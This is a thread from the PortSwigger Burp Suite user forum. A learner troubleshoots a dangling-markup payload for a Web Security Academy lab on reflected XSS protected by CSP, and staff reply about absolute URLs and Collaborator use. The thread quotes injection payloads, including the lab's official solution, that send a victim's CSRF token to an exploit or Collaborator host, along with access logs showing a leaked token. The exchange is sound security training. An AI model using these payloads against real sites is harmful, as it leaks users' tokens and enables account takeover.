Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

I wan't to know Why my payload is not working.

Jatin | Last updated: Nov 04, 2021 08:09PM UTC

Lab : Reflected XSS protected by CSP, with dangling markup attack In the exploit server the payload I used : <script> document.location.href="https://ac0c1f7a1ef35ec4c0b32e8b00530047.web-security-academy.net/my-account?email=hero%22%3Cscr%3E%3Cimg%20src=%27exploit-ace41fe81e7e5e87c0612e40016c0010.web-security-academy.net/%3Fblah=" <script> When I used the above payload I was able to see my csrf token being sent to the exploit server, but when i send the exploit to victim the csrf token of the victim was not directed to my exploit server. ------------------------ then i used the below payload that was given in the solution and it worked : <script> location='https://your-lab-id.web-security-academy.net/my-account?email=%22%3E%3Ctable%20background=%27//your-collaborator-id.burpcollaborator.net?'; </script> ----------------- Could you please explain me why my payload didn't worked.....

Maria | Last updated: Nov 05, 2021 09:33AM UTC

I am facing the exact same issue

Liam, PortSwigger Agent | Last updated: Nov 05, 2021 11:46AM UTC

Hi Jatin. It looks like you didn't use an absolute URL. So your IMG injection is going to a relative URL. e.g. <img src=exploit-ace41fe81e7e5e87c0612e40016c0010.web-security-academy.net/%3Fblah=> is incorrect, it should be: <img src=https://exploit-ace41fe81e7e5e87c0612e40016c0010.web-security-academy.net/%3Fblah=> It is also worth noting, that our exploit uses // which means relative protocol, so in this case, it is equivalent to using HTTPS://

Jatin | Last updated: Nov 05, 2021 06:38PM UTC

I made the changes but it's still not working below are the access logs : 103.120.152.114 2021-11-05 18:33:38 +0000 "GET /exploit HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" 103.120.152.114 2021-11-05 18:33:39 +0000 "GET /?blah=%22%22%3E%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cinput%20required%20type=%22hidden%22%20name=%22csrf%22%20value=%222vuN4qNWle4r2lRyXE2YEaAkdtL5qrVn%22%3E%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cbutton%20class= HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0" it's giving me my csrf token but not working for the victim Below is the log for request made by victim, I am getting only this much from the victim side. 172.31.31.31 2021-11-05 18:37:02 +0000 "GET /exploit/ HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"

Ben, PortSwigger Agent | Last updated: Nov 08, 2021 08:57AM UTC

Hi Jatin, This lab requires the use of the Burp Collaborator in order to solve it successfully - to confirm, are you trying to solve the lab without using Collaborator?

Adrian | Last updated: Dec 28, 2021 11:19PM UTC

I would like to make an update to the case, as it seems that the latest Chrome/Chromium versions are protecting from using the dangling markup. The payload that is working on Firefox and trigger response seen on Burp Collaborator, doesn't work on Chrome and since the automated victim is using updated Chrome/Chromium the Lab seems to be unsolvable for a moment. The same "issue" can be observed in the "Reflected XSS protected by very strict CSP, with dangling markup attack".

Michelle, PortSwigger Agent | Last updated: Jan 06, 2022 09:59AM UTC

Thanks for getting in touch. I've just been running some checks on the lab 'Reflected XSS protected by CSP, with dangling markup attack' using Burp's embedded browser and was able to solve the lab using the instructions in the solution. Can you email over details of the steps you were taking and the payload you were using so we can take a closer look, please?

Gokul | Last updated: Jul 08, 2022 08:41PM UTC

dealing with the same issue

Michelle, PortSwigger Agent | Last updated: Jul 11, 2022 07:43AM UTC

Hi We haven't been able to replicate this problem when using the solution supplied with the lab. If you're still having issues, can you email the details of the steps you were taking (or a screen recording) and the payload you were using to support@portswigger.net, so we can take a closer look, please?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.